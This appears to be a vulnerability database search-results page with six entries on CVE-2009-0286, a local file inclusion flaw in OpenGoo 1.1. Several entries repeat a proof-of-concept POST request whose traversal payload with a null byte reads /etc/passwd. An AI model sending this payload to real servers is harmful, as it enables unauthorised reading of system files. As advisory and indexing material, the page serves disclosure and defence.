6 matches found
Directory traversal
Directory traversal vulnerability in upgrade/index.php in OpenGoo 1.1, when registerglobals is enabled and magicquotesgpc is disabled, allows remote attackers to read arbitrary files via a .. dot dot in the formdatascriptclass parameter...
CVE-2009-0286
OpenGoo 1.1 is affected by a directory traversal vulnerability in upgrade/index.php. If register_globals is enabled and magic_quotes_gpc is disabled, an attacker can read arbitrary files via a .. in the form_data[script_class] parameter. This is the concrete vulnerability described across the CVE...
OpenGoo 1.1 - Local File Inclusion
OpenGoo 1.1 - Local File Inclusion OpenGoo 1.1 Local File Inclusion http://www.opengoo.org/ magicquotesgpc = Off registerglobals = On http://site/opengoo/public/upgrade/index.php POST: formdatascriptclass=/../../../../../../../../../../../etc/passwd%00.html Author Notified: Jan. 18...
OpenGoo 1.1 - Local File Inclusion
OpenGoo 1.1 Local File Inclusion http://www.opengoo.org/ magicquotesgpc = Off registerglobals = On http://site/opengoo/public/upgrade/index.php POST: formdatascriptclass=/../../../../../../../../../../../etc/passwd%00.html Author Notified: Jan. 18 http://nukeit.org milw0rm.com 2009-01-25...
OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability
Exploit for unknown platform in category web applications ============================================================= OpenGoo 1.1 scriptclass Local File Inclusion Vulnerability ============================================================= OpenGoo 1.1 Local File Inclusion http://www.opengoo.org/...
OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability
No description provided by source. OpenGoo 1.1 Local File Inclusion http://www.opengoo.org/ magicquotesgpc = Off registerglobals = On http://site/opengoo/public/upgrade/index.php POST: formdatascriptclass=/../../../../../../../../../../../etc/passwd%00.html Author Notified: Jan. 18...